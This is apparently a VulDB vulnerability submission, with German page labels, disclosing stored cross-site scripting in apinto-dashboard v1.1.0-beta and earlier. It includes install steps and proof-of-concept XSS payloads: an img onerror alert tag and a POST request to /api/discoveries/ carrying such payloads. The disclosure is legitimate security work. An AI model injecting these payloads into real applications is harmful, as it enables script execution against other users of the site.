Submit #50340: apinto-dashboard Multiple authenticated store XSS in apinto-dashboard <= v1.1.0-betainfo

Titelapinto-dashboard Multiple authenticated store XSS in apinto-dashboard <= v1.1.0-beta
Beschreibungrepo: https://github.com/eolinker/apinto-dashboard 1,Download and unzip the installation package Apinto 2,Start gateway 3,Download and unzip the installation package Apinto Dashboard 4,Start Apinto Dashboard ```bash wget https://github.com/eolinker/apinto/releases/download/v0.8.0/apinto-v0.8.0.linux.x64.tar.gz && tar -zxvf apinto-v0.8.0.linux.x64.tar.gz && cd apinto ./apinto start cd .. wget https://github.com/eolinker/apinto-dashboard/releases/download/v1.1.0-beta/apinto-dashboard-v1.1.0-beta.linux.x64.tar.gz && tar -zxvf apinto-dashboard-v1.1.0-beta.linux.x64.tar.gz && cd apinto-dashboard ./apinto-dashboard ``` This problem exists in most pages with tables. For example, on the/discoveries/list page, add an item at random and enter `<img src=1 onerror=alert(/xss/)>` in the description Then click Details to trigger. Request URL: /api/discoveries/ Request Method: POST PostData: {"health_on":false,"name":"1<img src=1 onerror=alert(111)>","driver":"static","description":"<img src=1 onerror=alert(222)>"} ![XroR8.png](https://c2.im5i.com/2022/11/01/XroR8.png) ![Xr9Zz.png](https://c2.im5i.com/2022/11/01/Xr9Zz.png) ![Xr3pU.png](https://c2.im5i.com/2022/11/01/Xr3pU.png) ![XrZPw.png](https://c2.im5i.com/2022/11/01/XrZPw.png) Reported by Neppah(@Tomy) from QSec-Team of Cyber Security Department at Qi'anxin Group on 2022-11-01.
Benutzer
 Tomy (UID 34751)
Einreichung01.11.2022 12:09 (vor 4 Jahren)
Moderieren01.11.2022 16:47 (5 hours later)
StatusAkzeptiert
VulDB Eintrag212639 [eolinker apinto-dashboard /api/discoveries/ Cross Site Scripting]
Punkte17

ZurückÜbersichtWeiter

Do you want to use VulDB in your project?

Use the official API to access entries easily!